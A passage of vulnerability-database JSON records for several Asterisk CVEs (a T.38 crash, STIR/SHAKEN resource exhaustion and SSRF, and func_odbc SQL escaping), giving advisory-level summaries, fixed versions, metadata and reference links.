"value": "res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-46837",
"datePublished": "2022-08-30T00:00:00",
"dateReserved": "2022-08-30T00:00:00",
"dateUpdated": "2024-08-04T05:17:42.455Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26498 (GCVE-0-2022-26498)
Vulnerability from nvd – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03
VLAI?
Summary
An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:03:32.984Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-04T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26498",
"datePublished": "2022-04-15T00:00:00",
"dateReserved": "2022-03-06T00:00:00",
"dateUpdated": "2024-08-03T05:03:32.984Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26651 (GCVE-0-2022-26651)
Vulnerability from nvd – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:11
VLAI?
Summary
An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:11:43.391Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26651",
"datePublished": "2022-04-15T00:00:00",
"dateReserved": "2022-03-07T00:00:00",
"dateUpdated": "2024-08-03T05:11:43.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26499 (GCVE-0-2022-26499)
Vulnerability from nvd – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03
VLAI?
Summary
An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it's possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:03:32.912Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An SSRF issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it\u0027s possible to send arbitrary requests (such as GET) to interfaces such as localhost by using the Identity header. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26499",
"datePublished": "2022-04-15T00:00:00",
"dateReserved": "2022-03-06T00:00:00",
"dateUpdated": "2024-08-03T05:03:32.912Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}